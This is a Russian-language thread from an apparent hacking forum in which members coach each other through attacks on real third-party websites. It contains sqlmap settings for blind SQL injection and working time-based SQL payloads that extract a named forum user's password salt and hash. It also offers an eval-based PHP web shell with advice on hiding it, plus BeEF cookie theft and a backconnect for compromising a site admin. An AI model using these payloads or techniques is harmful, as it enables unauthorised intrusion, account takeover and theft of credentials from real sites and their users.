Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    based blind Havij не возьмет. Просканируй Burpsuite на наличие уязвимости или Acunetix. Может не точный параметр сканер определил из-за этого не видит уязвимость скульмап
     
  2. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    Нет,руками крутится
     
  3. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Если руками крутится значит и сульмап должен видеть. Ему надо точный параметр. В таргете что-то не так
     
  4. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Пробуи
    Code:
    --level=3 --risk=3 --user-agent
     
    Alexandr17 likes this.
  5. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    based blind без этих значений мап не увидит уязвимость. Так что обязательно надо подставлять. А там уже и темперы по надобности
     
  6. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Ну хз... У меня лично без этих значений не видел мап уязвимости based blind, ни по GET и POST параметру
     
    #2186 Alexandr17, 26 Dec 2017
    Last edited: 26 Dec 2017
  7. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,096
    Likes Received:
    787
    Reputations:
    229
    _________________________
  8. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
  9. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Есть еще SQLI Dumper. Пихай скулю в него. Может получиться. Но почему мап не видет тут загадка. Я думаю что в таргете что-то не так. Тебе нужно просканировать бурпом. И результаты с него кинуть в мап. Я так понял у тебя по GET запросу скуля? Подставляй значение --level=5 --risk=3 --space2comment --random-agent и потоки выставь на минимум. Пробуй менять значение. Если по POST запросу скуля, то Дампером и не пробуй даже
     
  10. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят
     
  11. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    39
    Reputations:
    0
    Делай дамп БД без вывода таблиц
     
  12. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    Выдрал талицу, вектор вот такой(оказалось вот такой префикс ibf_)
    Code:
    and (select sleep(5) from dual where (select members_pass_salt from ibf_members where name like '%Wilda%' limit 0,1) like '______')-- -' True
    
    and (select sleep(5) from dual where (select members_pass_hash from ibf_members where name like '%Wilda%' limit 0,1) like '________________________________')-- -' True
    
    Из чего следует что соль будет 5 символов, а хєш пароля 32

    Вопрос,я понял что теперь остается брутить символы, только как узнать правильную их последовательность?
     
  13. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
    PS. Одна из идеи было переписать .htaccess
     
    #2193 Octavian, 27 Dec 2017
    Last edited: 27 Dec 2017
  14. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    записать в файл <? eval($_GET[cmd]);?> Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь
     
  15. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Ты внимательно читаи знаеш что твкое IP?
     
  16. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    Значит ищи раскрытие путей, и заливай мини шел через php файл
     
  17. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    85
    Likes Received:
    10
    Reputations:
    0
    Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.
     
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    _
     
  19. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Ты внимательно читаи знаеш что твкое IP?+(проверил отправив svg с js-ом) я отправив js получял уже куки и там по кукам видно что ораничения по IP )
     
    #2199 Octavian, 28 Dec 2017
    Last edited: 28 Dec 2017
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    538
    Likes Received:
    1,002
    Reputations:
    333
    Бекконнект как вариант, далее по обстоятельствам.
     
    Octavian, zifus and t0ma5 like this.
Loading...